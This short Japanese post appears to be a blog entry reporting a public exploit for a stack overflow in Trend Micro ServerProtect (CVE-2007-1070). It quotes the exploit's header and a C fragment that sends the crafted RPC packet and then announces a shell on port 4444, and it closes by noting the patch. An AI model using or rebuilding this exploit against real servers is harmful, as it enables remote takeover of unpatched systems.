Server Protectの脆弱性をつくExploitが出ています。ShellPortが4444であくそうです。
/*
* Copyright (c) 2007 devcode
*
*
* ^^ D E V C O D E ^^
*
* Trend Micro ServerProtect eng50.dll Stack Overflow
* [CVE-2007-1070]
*
*
* Description:
* A boundary error within a function in eng50.dll can be
* exploited to cause a stack-based buffer overflow via a
* specially crafted RPC request to the SpntSvc.exe service.
*
* Hotfix/Patch:
* http://www.trendmicro.com/download/product.asp?productid=17
*
* Vulnerable systems:
* ServerProtect for Windows 5.58
* ServerProtect for EMC 5.58
* ServerProtect for Network Appliance Filer 5.61
* ServerProtect for Network Appliance Filer 5.62
*
* Tested on:
* Microsoft Windows 2000 SP4
*
* This is a PoC and was created for educational purposes only. The
* author is not held responsible if this PoC does not work or is
* used for any other purposes than the one stated above.
*
* Notes:
* <3 TippingPoint for technical details. Had this made few days after
* disclosure (few months back), was rlsd on r1918 about a week ago
* and I notice trend micro exploit reports on isc.sans.org. DIDNT KNOW
* I WAS THIS HOT DAYUM
*
*
*/
このへんで送ってますね。
printf("[+] Sending DCE Request packet...\n");
nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 );
if ( nRet == SOCKET_ERROR ) {
printf("[-] Cannot send\n");
closesocket( sConnect );
return -1;
}
printf("[+] Check shell on port 4444 :)\n");
nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );
closesocket( sConnect );
return 0;
2007/07/27にパッチが出ているspnt_558_win_en_securitypatch4.exe の対応みたいですね。
